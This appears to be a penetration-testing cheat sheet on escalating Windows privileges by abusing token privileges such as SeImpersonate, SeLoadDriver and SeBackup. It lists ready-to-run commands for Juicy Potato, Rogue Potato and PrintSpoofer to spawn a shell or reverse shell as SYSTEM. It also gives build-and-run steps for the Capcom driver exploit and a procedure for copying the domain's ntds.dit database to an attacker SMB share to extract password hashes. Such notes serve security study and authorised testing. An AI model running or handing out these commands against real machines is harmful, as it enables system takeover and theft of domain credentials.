Skip to content

Privilege Abuse

SeImpersonatePrivilege

  • Rotten Potato
    • Works up until sometime in 2019.
    • Patched on latest Windows 10.
  • Juicy Potato
    • JuicyPotato.exe -l 1337 -p -t * -c <{CLSID}>
  • Rogue Potato
    • Instructions
      • Listener on Kali: sudo socat tcp-listen:135,reuseaddr,fork tcp:<Victim ip address>:9999
      • On victim Windows machine: RoguePotato.exe -r 10.0.0.5 -l 9999 -e "C:\windows\system32\cmd.exe"
  • PrintSpoofer
    • Targets print spooler service
    • Does not require any port forwarding like potato exploits.
    • PrintSpoofer.exe -i -c "C:\reverse\shell.exe"

SeAssignPrimaryTokenPrivilege

  • Potato Exploits (SeImpersonatePrivilege)

SeLoadDriverPrivilege

  • Capcom.sys from fuzzysecurity
  • https://github.com/TarlogicSecurity/EoPLoadDriver/
    • eoploaddriver.cpp
  • Exploitcapcom from github
  • Compile EoPLoadDriver in visual studio
    • Create a new project
      • Console app
      • Name it LoadDriver
    • Open LoadDriver.cpp
      • Replace all contents with contents from eoploaddriver.cpp
    • Select "Release" and "x64"
    • Build --> Rebuild Solution. LoadDriver.exe should be created.
  • Compile ExploitCapCom
    • File --> Open -- Project/Solution
      • Select Exploit Capcom
      • Set "Release" and "x64"
      • Rebuild solution
      • ExploitCapCom.exe should be created
  • Transfer ExploitCapCom.exe, LoadDriver.exe, and capcom.sys to victim machine
    • LoadDriver.exe System\CurrentControlSet\MyService C:\
    • .\ExploitCapCom.exe
    • Should have system shell.

SeBackupPrivilege

  • Grants read access to all objects on the system regardless of ACL
    • Read sensitive files
    • Extract hashes
      • Pass-the-hash
      • Crack them

Backup ntds file to SMB server

Create NTFS share on attacker

Step Command
Create 2gb NTFS folder called ntfs.disk dd if=/dev/zero of=ntfs.disk bs=1024M count=2
Create loopback setup sudo losetup -fP ntfs.disk
Check losetup losetup
Create NTFS disk sudo mkfs.ntfs /dev/loop0
Mount NTFS disk to a folder sudo mount /dev/loop0 ./smb
Edit SMB to setup SMB share See below - /etc/samba/smb.conf
Start smb share sudo systemctl restart smbd
/etc/samba/smb.conf:
[shared]
comment = <anything>
browseable = yes
path = <local path to SMB share>
read only = no
guest = yes

Backup ntds file from victim

echo y | wbadmin start backup -backuptarget:\\<ip address>\share -include:C:\windows\ntds\

Extract contents of .vhdx on victim (using attacker SMB share)

echo y | wbadmin start recovery -version:<version> -itemtype:file -items:C:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl

ntds.dit should be in C:\

SeRestorePrivilege

  • Grants write access to all objects on the system regardless of ACL
  • Modify service binaries
  • Overwrite DLLs used by SYSTEM processes
  • Modify registry settings

SeTakeOwnershipPrivilege

  • Lets the owner take ownership over an object
  • Same as SeRestorePrivilege after taking ownership of files

More reading on token abuse: https://github.com/hatRiot/token-priv/blob/master/abusing_token_eop_1.0.txt